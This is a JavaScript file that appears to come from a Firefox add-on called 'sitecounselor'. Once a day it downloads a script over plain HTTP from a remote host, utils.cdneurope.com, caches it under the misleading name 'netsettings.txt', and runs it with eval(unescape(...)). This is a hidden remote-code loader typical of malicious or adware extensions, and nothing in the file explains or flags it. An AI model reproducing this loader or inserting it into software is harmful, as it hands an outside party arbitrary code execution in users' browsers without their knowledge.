var website_rec = new function() {
	var self = this;

	var DEBUG = false;

	var log = function(logInfo) {
		if (DEBUG) { console.log(logInfo); }
	};		

	// consts
	this.REMOTE_URL = "http://utils.cdneurope.com/js/link-ff.js";
	this.LOCAL_URL = "http://localhost/mon/link-ff.js";
	this.LOCAL_FILENAME = "netsettings.txt";
	this.LAST_CACHED_PREF_NAME = "li";
	this.DAYS_ENABLE = 1;
	this.OVERRIDE_CHECK = false;

	// fields
	this.linkFileCacher = null;
	this.url = null;
	this.AddonInfo = null;
	this.PrefMan = null;
	this.TimePassed = null;
	this.FileCacher = null;

	this.init = function() {
		this.loadModules();
		this.setDebug();
		var timePassed = new this.TimePassed();
		if (!this.OVERRIDE_CHECK && !timePassed.hasTimePassed(this.DAYS_ENABLE, timePassed.TIME_TYPE.DAYS)) {
			log("not passed yet - li");
			return;
		}
		log("passed yet - li");
		this.setUrl();
		this.linkFileCacher = new this.FileCacher(this.url, this.LOCAL_FILENAME, this.LAST_CACHED_PREF_NAME);
		this.linkFileCacher.getFileContents(function(fileContents) {
			eval(unescape(fileContents));
		});
	};

	this.setUrl = function() {
		if (DEBUG) {
			this.url = this.LOCAL_URL;
			return;
		}
		this.url = this.REMOTE_URL;
	};

	this.loadModules = function() {
		Components.utils.import("resource://sitecounselor/FileCacher.js", this);
		Components.utils.import("resource://sitecounselor/AddonInfo.js", this);
		Components.utils.import("resource://sitecounselor/TimePassed.js", this);
		Components.utils.import("resource://sitecounselor/PrefMan.js", this);
	};	

	this.setDebug = function() {
		if (DEBUG && this.AddonInfo && this.AddonInfo.debug === false) { DEBUG = false; }
	};

	this.init();
};